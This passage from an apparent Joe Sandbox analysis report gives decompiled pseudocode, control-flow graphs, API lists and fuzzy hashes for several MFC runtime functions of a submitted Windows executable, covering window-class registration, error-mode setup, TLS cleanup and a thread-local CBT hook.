                                                                                                                            control_flow_graph 386 40ca66-40ca7c call 40706d 389 40ca86-40cac1 call 41ec90 call 40706d 386->389 390 40ca7e-40ca81 386->390 396 40cac3-40cadc call 40c882 389->396 397 40cadf-40cae3 389->397 391 40cd35-40cd36 390->391 396->397 408 40cade 396->408 399 40cb03-40cb07 397->399 400 40cae5-40cafe call 40c882 397->400 401 40cb09-40cb25 call 40c882 399->401 402 40cb2a-40cb2e 399->402 400->399 414 40cb00 400->414 401->402 415 40cb27 401->415 406 40cb50-40cb53 402->406 407 40cb30-40cb4b call 40ca25 402->407 412 40cb55-40cb78 call 40ca25 406->412 413 40cb7c-40cb80 406->413 407->406 423 40cb4d 407->423 408->397 412->413 429 40cb7a 412->429 418 40cba0-40cba4 413->418 419 40cb82-40cb92 call 40a6a7 413->419 414->399 415->402 421 40cba6-40cbb8 call 40a6a7 418->421 422 40cbba-40cbbe 418->422 425 40cb97-40cb99 419->425 421->422 427 40cbc0-40cbd5 call 40a6a7 422->427 428 40cbd7-40cbdf 422->428 423->406 425->418 427->428 432 40cbf0-40cbf8 428->432 433 40cbe1-40cbee call 40a6a7 428->433 429->413 436 40cbfa-40cc0b call 40a6a7 432->436 437 40cc0d-40cc15 432->437 433->432 436->437 439 40cc17-40cc28 call 40a6a7 437->439 440 40cc2a-40cc32 437->440 439->440 444 40cc34-40cc45 call 40a6a7 440->444 445 40cc47-40cc4f 440->445 444->445 448 40cc51-40cc62 call 40a6a7 445->448 449 40cc64-40cc6c 445->449 448->449 452 40cc81-40cc89 449->452 453 40cc6e-40cc7f call 40a6a7 449->453 455 40cc9a-40cca2 452->455 456 40cc8b-40cc98 call 40a6a7 452->456 453->452 460 40ccb3-40ccbb 455->460 461 40cca4-40ccb1 call 40a6a7 455->461 456->455 464 40ccd0-40ccd8 460->464 465 40ccbd-40ccce call 40a6a7 460->465 461->460 468 40ccda-40cceb call 40a6a7 464->468 469 40cced-40ccf5 464->469 465->464 468->469 471 40cd06-40cd1a 469->471 472 40ccf7-40cd04 call 40a6a7 469->472 476 40cd25-40cd34 471->476 477 40cd1c-40cd22 471->477 472->471 476->391 477->476
                                                                                                                            C-Code - Quality: 94%
                                                                                                                            			E0040CA66(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t173;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E0040706D(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E0041EC90(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E0040706D(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x4444a8; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E0040C882(_t187, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E0040C882(_t187, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E0040C882(_t187, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E0040CA25(__eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E0040CA25(__eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t173 = E0040A6A7(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0); // executed
					_t201 = _t201 | _t173;
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E0040A6A7(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E0040A6A7(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E0040A6A7(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E0040A6A7(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E0040A6A7(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}




























                                                                                                                            0x0040ca66
                                                                                                                            0x0040ca6c
                                                                                                                            0x0040ca71
                                                                                                                            0x0040ca79
                                                                                                                            0x0040ca79
                                                                                                                            0x0040ca7c
                                                                                                                            0x00000000
                                                                                                                            0x0040ca80
                                                                                                                            0x0040ca86
                                                                                                                            0x0040ca87
                                                                                                                            0x0040ca88
                                                                                                                            0x0040ca92
                                                                                                                            0x0040ca94
                                                                                                                            0x0040caa1
                                                                                                                            0x0040caa4
                                                                                                                            0x0040caa9
                                                                                                                            0x0040cab2
                                                                                                                            0x0040cab5
                                                                                                                            0x0040caba
                                                                                                                            0x0040cabb
                                                                                                                            0x0040cabe
                                                                                                                            0x0040cac1
                                                                                                                            0x0040cac6
                                                                                                                            0x0040cac7
                                                                                                                            0x0040cace
                                                                                                                            0x0040cad5
                                                                                                                            0x0040cada
                                                                                                                            0x0040cadc
                                                                                                                            0x0040cade
                                                                                                                            0x0040cade
                                                                                                                            0x0040cade
                                                                                                                            0x0040cadc
                                                                                                                            0x0040cadf
                                                                                                                            0x0040cae3
                                                                                                                            0x0040cae5
                                                                                                                            0x0040caef
                                                                                                                            0x0040caf0
                                                                                                                            0x0040caf7
                                                                                                                            0x0040cafc
                                                                                                                            0x0040cafe
                                                                                                                            0x0040cb00
                                                                                                                            0x0040cb00
                                                                                                                            0x0040cb00
                                                                                                                            0x0040cafe
                                                                                                                            0x0040cb03
                                                                                                                            0x0040cb07
                                                                                                                            0x0040cb0c
                                                                                                                            0x0040cb0d
                                                                                                                            0x0040cb10
                                                                                                                            0x0040cb17
                                                                                                                            0x0040cb1e
                                                                                                                            0x0040cb23
                                                                                                                            0x0040cb25
                                                                                                                            0x0040cb27
                                                                                                                            0x0040cb27
                                                                                                                            0x0040cb27
                                                                                                                            0x0040cb25
                                                                                                                            0x0040cb2a
                                                                                                                            0x0040cb2e
                                                                                                                            0x0040cb3e
                                                                                                                            0x0040cb41
                                                                                                                            0x0040cb44
                                                                                                                            0x0040cb49
                                                                                                                            0x0040cb4b
                                                                                                                            0x0040cb4d
                                                                                                                            0x0040cb4d
                                                                                                                            0x0040cb4d
                                                                                                                            0x0040cb4b
                                                                                                                            0x0040cb50
                                                                                                                            0x0040cb53
                                                                                                                            0x0040cb63
                                                                                                                            0x0040cb6a
                                                                                                                            0x0040cb71
                                                                                                                            0x0040cb76
                                                                                                                            0x0040cb78
                                                                                                                            0x0040cb7a
                                                                                                                            0x0040cb7a
                                                                                                                            0x0040cb7a
                                                                                                                            0x0040cb78
                                                                                                                            0x0040cb7c
                                                                                                                            0x0040cb80
                                                                                                                            0x0040cb8b
                                                                                                                            0x0040cb92
                                                                                                                            0x0040cb97
                                                                                                                            0x0040cb99
                                                                                                                            0x0040cb99
                                                                                                                            0x0040cb99
                                                                                                                            0x0040cb99
                                                                                                                            0x0040cba0
                                                                                                                            0x0040cba4
                                                                                                                            0x0040cbac
                                                                                                                            0x0040cbb8
                                                                                                                            0x0040cbb8
                                                                                                                            0x0040cbb8
                                                                                                                            0x0040cbba
                                                                                                                            0x0040cbbe
                                                                                                                            0x0040cbc9
                                                                                                                            0x0040cbd5
                                                                                                                            0x0040cbd5
                                                                                                                            0x0040cbd5
                                                                                                                            0x0040cbdc
                                                                                                                            0x0040cbdf
                                                                                                                            0x0040cbe6
                                                                                                                            0x0040cbee
                                                                                                                            0x0040cbee
                                                                                                                            0x0040cbee
                                                                                                                            0x0040cbf5
                                                                                                                            0x0040cbf8
                                                                                                                            0x0040cbff
                                                                                                                            0x0040cc0b
                                                                                                                            0x0040cc0b
                                                                                                                            0x0040cc0b
                                                                                                                            0x0040cc12
                                                                                                                            0x0040cc15
                                                                                                                            0x0040cc1c
                                                                                                                            0x0040cc28
                                                                                                                            0x0040cc28
                                                                                                                            0x0040cc28
                                                                                                                            0x0040cc2f
                                                                                                                            0x0040cc32
                                                                                                                            0x0040cc39
                                                                                                                            0x0040cc45
                                                                                                                            0x0040cc45
                                                                                                                            0x0040cc45
                                                                                                                            0x0040cc4c
                                                                                                                            0x0040cc4f
                                                                                                                            0x0040cc56
                                                                                                                            0x0040cc62
                                                                                                                            0x0040cc62
                                                                                                                            0x0040cc62
                                                                                                                            0x0040cc69
                                                                                                                            0x0040cc6c
                                                                                                                            0x0040cc73
                                                                                                                            0x0040cc7f
                                                                                                                            0x0040cc7f
                                                                                                                            0x0040cc7f
                                                                                                                            0x0040cc86
                                                                                                                            0x0040cc89
                                                                                                                            0x0040cc90
                                                                                                                            0x0040cc98
                                                                                                                            0x0040cc98
                                                                                                                            0x0040cc98
                                                                                                                            0x0040cc9f
                                                                                                                            0x0040cca2
                                                                                                                            0x0040cca9
                                                                                                                            0x0040ccb1
                                                                                                                            0x0040ccb1
                                                                                                                            0x0040ccb1
                                                                                                                            0x0040ccb8
                                                                                                                            0x0040ccbb
                                                                                                                            0x0040ccc2
                                                                                                                            0x0040ccce
                                                                                                                            0x0040ccce
                                                                                                                            0x0040ccce
                                                                                                                            0x0040ccd5
                                                                                                                            0x0040ccd8
                                                                                                                            0x0040ccdf
                                                                                                                            0x0040cceb
                                                                                                                            0x0040cceb
                                                                                                                            0x0040cceb
                                                                                                                            0x0040ccf2
                                                                                                                            0x0040ccf5
                                                                                                                            0x0040ccfc
                                                                                                                            0x0040cd04
                                                                                                                            0x0040cd04
                                                                                                                            0x0040cd04
                                                                                                                            0x0040cd06
                                                                                                                            0x0040cd09
                                                                                                                            0x0040cd0c
                                                                                                                            0x0040cd18
                                                                                                                            0x0040cd1a
                                                                                                                            0x0040cd1f
                                                                                                                            0x0040cd22
                                                                                                                            0x0040cd22
                                                                                                                            0x0040cd22
                                                                                                                            0x0040cd31
                                                                                                                            0x0040cd33
                                                                                                                            0x0040cd33
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s$hBC
                                                                                                                            • API String ID: 2102423945-1904596074
                                                                                                                            • Opcode ID: 8877061909f1dd2375b04af8d02c33f04acb7d961ccb2d8d65446157cd9adc1f
                                                                                                                            • Instruction ID: 2bad230e3a25c2c09092c4f84b2fc3e271b7d2d6e6fd341ed47e3edd72e6dcf7
                                                                                                                            • Opcode Fuzzy Hash: 8877061909f1dd2375b04af8d02c33f04acb7d961ccb2d8d65446157cd9adc1f
                                                                                                                            • Instruction Fuzzy Hash: 3D814D71D00209AADB50DFA8D585BDFBAF8AB08344F14817AF949F62C1E7789A44CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00419CED Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E00419CED(void* __ebx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				signed int _t11;
				void* _t14;
				intOrPtr _t17;
				void* _t18;
				struct HINSTANCE__* _t19;
				void* _t30;
				intOrPtr _t34;
				void* _t35;
				void* _t37;

				_t37 = __eflags;
				_t31 = __edi;
				_t30 = __edx;
				_t25 = __ebx;
				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0040706D(__ebx, __edi, SetErrorMode, _t37);
				_t34 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t34;
				 *((intOrPtr*)(_t14 + 0xc)) = _t34;
				E004068D0(__ebx, _t14);
				_t17 =  *((intOrPtr*)(E0040706D(_t25, __edi, _t34, _t37) + 4));
				_t38 = _t17;
				if(_t17 != 0) {
					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
					 *((intOrPtr*)(_t17 + 0x44)) = _t34;
					E00419B6E(_t17, _t30, _t38);
				}
				_t18 = E0040706D(_t25, _t31, _t34, _t38);
				_t39 =  *((char*)(_t18 + 0x14));
				_pop(_t35);
				if( *((char*)(_t18 + 0x14)) == 0) {
					E00405DE6(_t35, _t39);
				}
				_t19 = GetModuleHandleA("user32.dll");
				if(_t19 != 0) {
					 *0x4442a4 = GetProcAddress(_t19, "NotifyWinEvent");
				}
				return 1;
			}













                                                                                                                            0x00419ced
                                                                                                                            0x00419ced
                                                                                                                            0x00419ced
                                                                                                                            0x00419ced
                                                                                                                            0x00419cf6
                                                                                                                            0x00419cfe
                                                                                                                            0x00419d00
                                                                                                                            0x00419d05
                                                                                                                            0x00419d0b
                                                                                                                            0x00419d0e
                                                                                                                            0x00419d11
                                                                                                                            0x00419d1b
                                                                                                                            0x00419d1e
                                                                                                                            0x00419d20
                                                                                                                            0x00419d26
                                                                                                                            0x00419d2d
                                                                                                                            0x00419d32
                                                                                                                            0x00419d35
                                                                                                                            0x00419d35
                                                                                                                            0x00419d3a
                                                                                                                            0x00419d3f
                                                                                                                            0x00419d43
                                                                                                                            0x00419d44
                                                                                                                            0x00419d46
                                                                                                                            0x00419d46
                                                                                                                            0x00419d50
                                                                                                                            0x00419d58
                                                                                                                            0x00419d66
                                                                                                                            0x00419d66
                                                                                                                            0x00419d6e

                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000000), ref: 00419CF6
                                                                                                                            • SetErrorMode.KERNELBASE(00000000), ref: 00419CFE
                                                                                                                              • Part of subcall function 004068D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00406911
                                                                                                                              • Part of subcall function 004068D0: SetLastError.KERNEL32(0000006F), ref: 0040692B
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00419D50
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00419D60
                                                                                                                              • Part of subcall function 00419B6E: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00419BB1
                                                                                                                              • Part of subcall function 00419B6E: PathFindExtensionA.KERNELBASE(?), ref: 00419BCB
                                                                                                                              • Part of subcall function 00419B6E: __strdup.LIBCMT ref: 00419C0D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorModule$FileModeName$AddressExtensionFindHandleLastPathProc__strdup
                                                                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                                                                            • API String ID: 2454351968-597752486
                                                                                                                            • Opcode ID: 6405e62b798052f7ff34f233a2a477c7a3f11c6a75ceff9dbe4f82da97e45410
                                                                                                                            • Instruction ID: eb371d94905f59a684aa10d23c2e42e3744fff5dad54189f46c99e61aefd3cfa
                                                                                                                            • Opcode Fuzzy Hash: 6405e62b798052f7ff34f233a2a477c7a3f11c6a75ceff9dbe4f82da97e45410
                                                                                                                            • Instruction Fuzzy Hash: F5014F70F147105FCB10AF359859A5A3B98AF44715F05846FF445AB3A2DA7CD840CF6E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E886 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 529 40e886-40e88f 530 40e891-40e8a2 call 40e6de 529->530 531 40e8a4-40e8a9 529->531 530->531 533 40e8b2-40e8b7 531->533 534 40e8ab-40e8ac TlsFree 531->534 536 40e8d0-40e8dc DeleteCriticalSection 533->536 537 40e8b9-40e8ca GlobalHandle GlobalUnlock GlobalFree 533->537 534->533 537->536
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040E886(long* __ecx) {
				intOrPtr _t4;
				long _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t4 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t4 + 4));
						E0040E6DE(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5); // executed
				}
				_t6 = _t15[4];
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}









                                                                                                                            0x0040e887
                                                                                                                            0x0040e889
                                                                                                                            0x0040e88f
                                                                                                                            0x0040e891
                                                                                                                            0x0040e891
                                                                                                                            0x0040e899
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e891
                                                                                                                            0x0040e8a4
                                                                                                                            0x0040e8a9
                                                                                                                            0x0040e8ac
                                                                                                                            0x0040e8ac
                                                                                                                            0x0040e8b2
                                                                                                                            0x0040e8b7
                                                                                                                            0x0040e8c0
                                                                                                                            0x0040e8c3
                                                                                                                            0x0040e8ca
                                                                                                                            0x0040e8ca
                                                                                                                            0x0040e8d4
                                                                                                                            0x0040e8dc

                                                                                                                            APIs
                                                                                                                            • TlsFree.KERNELBASE(?), ref: 0040E8AC
                                                                                                                            • GlobalHandle.KERNEL32(?), ref: 0040E8BA
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040E8C3
                                                                                                                            • GlobalFree.KERNEL32 ref: 0040E8CA
                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 0040E8D4
                                                                                                                              • Part of subcall function 0040E6DE: EnterCriticalSection.KERNEL32(?), ref: 0040E73B
                                                                                                                              • Part of subcall function 0040E6DE: LeaveCriticalSection.KERNEL32(?,?), ref: 0040E74B
                                                                                                                              • Part of subcall function 0040E6DE: LocalFree.KERNEL32(?), ref: 0040E754
                                                                                                                              • Part of subcall function 0040E6DE: TlsSetValue.KERNEL32(?,00000000), ref: 0040E766
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1549993015-0
                                                                                                                            • Opcode ID: 87c866bf384fd305e8e03eaf61050b2a2e296f125a913ed47a27757c7d5ddcd6
                                                                                                                            • Instruction ID: b5b527c497ac71bd5738965a4a6ac0de6cd30659706c6e7dbb79976ba1b73320
                                                                                                                            • Opcode Fuzzy Hash: 87c866bf384fd305e8e03eaf61050b2a2e296f125a913ed47a27757c7d5ddcd6
                                                                                                                            • Instruction Fuzzy Hash: 79F0B4326002005BD720AF29AC08A2B77A8AF84B227194939F801E3290CB39DD028629
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040BC3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E0040BC3C(void* __ebx, void* __edi, void* __eflags) {
				intOrPtr _v0;
				void* __esi;
				struct HHOOK__* _t6;
				void* _t10;
				intOrPtr _t11;
				void* _t13;
				struct HHOOK__* _t14;

				_t10 = __edi;
				_push(E00405A19);
				_t6 = E0040E7CC(__ebx, 0x442940, __edi, _t13, __eflags);
				_t14 = _t6;
				if(_t14 == 0) {
					_t6 = E0040D8B0(0x442940);
				}
				_push(_t10);
				_t11 = _v0;
				if( *((intOrPtr*)(_t14 + 0x14)) != _t11) {
					if( *(_t14 + 0x28) == 0) {
						_t6 = SetWindowsHookExA(5, E0040B9E9, 0, GetCurrentThreadId()); // executed
						 *(_t14 + 0x28) = _t6;
						if(_t6 == 0) {
							_t6 = E0040D87C(0x442940);
						}
					}
					 *((intOrPtr*)(_t14 + 0x14)) = _t11;
				}
				return _t6;
			}










                                                                                                                            0x0040bc3c
                                                                                                                            0x0040bc3d
                                                                                                                            0x0040bc47
                                                                                                                            0x0040bc4c
                                                                                                                            0x0040bc50
                                                                                                                            0x0040bc52
                                                                                                                            0x0040bc52
                                                                                                                            0x0040bc57
                                                                                                                            0x0040bc58
                                                                                                                            0x0040bc5f
                                                                                                                            0x0040bc65
                                                                                                                            0x0040bc77
                                                                                                                            0x0040bc7f
                                                                                                                            0x0040bc82
                                                                                                                            0x0040bc84
                                                                                                                            0x0040bc84
                                                                                                                            0x0040bc82
                                                                                                                            0x0040bc89
                                                                                                                            0x0040bc89
                                                                                                                            0x0040bc8e

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040E7CC: __EH_prolog3.LIBCMT ref: 0040E7D3
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040BC67
                                                                                                                            • SetWindowsHookExA.USER32 ref: 0040BC77
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentException@8H_prolog3HookThreadThrowWindows
                                                                                                                            • String ID: @)D
                                                                                                                            • API String ID: 1226552664-3123465904
                                                                                                                            • Opcode ID: a890c810d522b8a378656b8b4de95f166b9e4fdd74f58f78b81efced01254975
                                                                                                                            • Instruction ID: 3c67bee7daf3aa9225a402281fd90b18a3dec672f9f08f79f2928ab3e27b52e9
                                                                                                                            • Opcode Fuzzy Hash: a890c810d522b8a378656b8b4de95f166b9e4fdd74f58f78b81efced01254975
                                                                                                                            • Instruction Fuzzy Hash: 7BF0A7716047005EE3306B965801B17B294DF90B25F10453FE545B31D0CB78984486BD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026F9 Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON
                                                                                                                            Download Yara Rule
